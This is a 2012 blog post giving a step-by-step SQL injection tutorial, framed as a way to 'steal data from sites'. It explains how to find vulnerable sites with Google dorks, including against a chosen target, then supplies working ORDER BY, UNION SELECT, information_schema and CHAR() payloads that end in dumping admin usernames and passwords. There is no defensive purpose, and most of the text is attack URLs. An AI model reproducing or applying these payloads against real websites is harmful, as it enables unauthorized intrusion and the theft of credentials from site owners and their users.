Monday, November 12, 2012

SQL Injection


Hello,
Whats up? A major target for hackers are websites, the vulnerable ones. Today we will have a look at a popular method to hack websites, this method is called sql injection.

Talking about sql (standard query language), it’s a query language used to manipulate databases of MySQL, Oracle etc. We will use simple sql queries to steal data from sites.

Difficulty: EASY

Below is a step by step guide to penetration:

STEP-1: Find vulnerable websites:
We will use Google Dork commands to find vulnerable sites. Type any of the following queries as Google search query-

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

You may download list of dorks from http://www.ziddu.com/download/13161874/A...t.zip.html to try.

Now, you have a list of websites as search result. You’ll have to visit them one by one to check if they are vulnerable.

But if you are going to hack a particular site, then try at Google search:
Site:www.targetsite.com dork_commands

Replace ‘targetsite’ with your desired site and dork_commands with dork commands, for example:
Site:www.targetsite.com inurl:index.php?id=


STEP-2: Check for vulnerablility:
Add a ' (single quotation mark) at the end of the url (no space between the url and the mark) at browser’s address bar and hit ENTER,

For example:
http://www.targetsite.com/index.php?id=2'

If any sql-related error is shown as a result, then YOU HAVE A CHANCE!!! PROCEED ON.

STEP-3: Find the number of columns in the database:
Replace the quotation mark (') with
order by n
each time replace n with 1,2,3,4 and so on, until you get an error like unknown column.

For example, try these urls one after one until you get a ‘unknown column’ error:
http://www.targetsite.com/index.php?id=2 order by 1
http://www.targetsite.com/index.php?id=2 order by 2
http://www.targetsite.com/index.php?id=2 order by 3
http://www.targetsite.com/index.php?id=2 order by 4

If you get the ‘unknown column’ error at, say n=6, then there are actually (n-1)=(6-1)=5
total columns in the table.

N.B. If the above url does not work, then add "--" after n;
for example,
http://www.targetsite.com/index.php?id=2 order by 1--
http://www.targetsite.com/index.php?id=2 order by 2--


STEP-4: Find vulnerable columns:
Replace "order by n" with "union select columns_sequence" to find vulnerable columns,

for example, assuming we got 5 columns at the previous step,
http://www.targetsite.com/index.php?id=2 union select 1,2,3,4,5--

As a result, some values (must be less than or equal to  the total numbers of columns) will be shown, like the one below:

3
Query was empty

That means column no. 3 is vulnerable! We will use the number 3 in the next step.

N.B. If the above url not working then try this:
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5--

or try this one:
http://www.targesite.com/index.php?id=2 union all select 1,2,3,4,5/*



STEP-5: Find the database version:
Replace the vulnerable column (no 3 in this example) with version() in the url,

for example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5--

Database version will be displayed.

N.B. If the above url does not work, try this:
http://www.targesite.com/index.php?id=2 union all select 1,2,@@version(),4,5/*

if "union+illegal mix of collatios (IMPLICIT+COERCIBLE)" is shown, the do either (a) or (b)-

(a) Evaluate the MySql version in this way:
http://www.targesite.com/index.php?id=2 union all select 1,2,convert(@@version using latin1),4,5/*

(b) Evaluate the MySql version in this way:
http://www.targesite.com/index.php?id=2 union all select 1,2,unhex(hex(@@version)),4,5/*


STEP-6: Find the tablename:
Assuming that we got database version 5 or 5+ from Step-5, in our url, replace 3 with "group_concat(table_name)" and add at the end of the url "from information_schema.tables where table_schema=database()"

for example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--

A list containing the table names will be displayed. Find the names like ‘admin’ or ‘user’ or similar one. Say, we’ve found the tablename ‘admin’.


STEP-7: Find the column name:
Convert the table name(table name is ‘admin’ in our example) to MySql CHAR() string using HackBar addon in Firefox:

In the Firefox browser, install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Now select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name here:

click ok

As a result, CHAR(numbers separated with commans) will be displayed in the Hack toolbar:



Now, in the url,  replace "group_concat(table_name) with the "group_concat(column_name)" and replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--"
but replace "mysqlchar()" with CHAR(number, number, number, number)

for example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

A list of column names will be shown, like the following:
admin,password,admin_id,admin_password,username,password... etc.

Now replace "group_concat(column_name) " with group_concat(columnname,0x3a,anothercolumnname)

here, "columnname" should be replaced by a listed column name and
"anothercolumnname" should be replaced by another listed column name;

and replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name"

for example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5 from admin--

If "column not found" is shown, try with different column names from the obtained list.
Finally, you’ll have the username and password list.

Hope you enjoyed the operation. Next time we will go a bit deeper of sql injection.
Posted by at No comments:
Subscribe to: Comments (Atom)